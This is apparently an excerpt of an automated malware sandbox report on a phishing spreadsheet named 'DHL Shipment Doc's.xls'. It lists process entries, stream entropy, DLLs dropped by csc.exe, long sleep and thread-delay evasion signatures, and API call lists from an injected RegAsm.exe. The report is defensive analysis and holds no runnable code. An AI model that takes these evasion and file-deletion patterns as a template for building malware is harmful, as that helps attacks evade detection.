                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: DHL Shipment Doc's.xlsStream path 'MBD0029C934/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
                    Source: DHL Shipment Doc's.xlsStream path 'Workbook' entropy: 7.99877116141 (max. 8.0)
                    Source: D5230000.0.drStream path 'MBD0029C934/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
                    Source: D5230000.0.drStream path 'Workbook' entropy: 7.99877421247 (max. 8.0)

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040F7E2 Sleep,ExitProcess,33_2_0040F7E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,33_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1361Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8588Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1890Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 525Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1053Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4705Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1674
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1187
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1927
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1927
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 795
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1049
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4083
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 7.2 %
                    Source: C:\Windows\System32\mshta.exe TID: 3692Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep count: 1361 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep count: 8588 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216Thread sleep count: 1053 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216Thread sleep count: 4705 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -1200000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3212Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\mshta.exe TID: 1564Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2168Thread sleep count: 259 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2168Thread sleep time: -129500s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2100Thread sleep count: 293 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2100Thread sleep time: -879000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1964Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2100Thread sleep count: 9156 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2100Thread sleep time: -27468000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1780Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 848Thread sleep count: 1187 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 848Thread sleep count: 1927 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1668Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3948Thread sleep count: 1927 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3948Thread sleep count: 795 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3884Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3940Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4000Thread sleep count: 1049 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4064Thread sleep count: 4083 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4036Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -1200000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,16_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_10006580 FindFirstFileExA,16_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040AE51 FindFirstFileW,FindNextFileW,20_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,21_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,33_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,33_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,33_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,33_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,33_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00407877 FindFirstFileW,FindNextFileW,33_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0044E8F9 FindFirstFileExA,33_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,33_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,33_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,33_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,33_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00418981 memset,GetSystemInfo,20_2_00418981
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
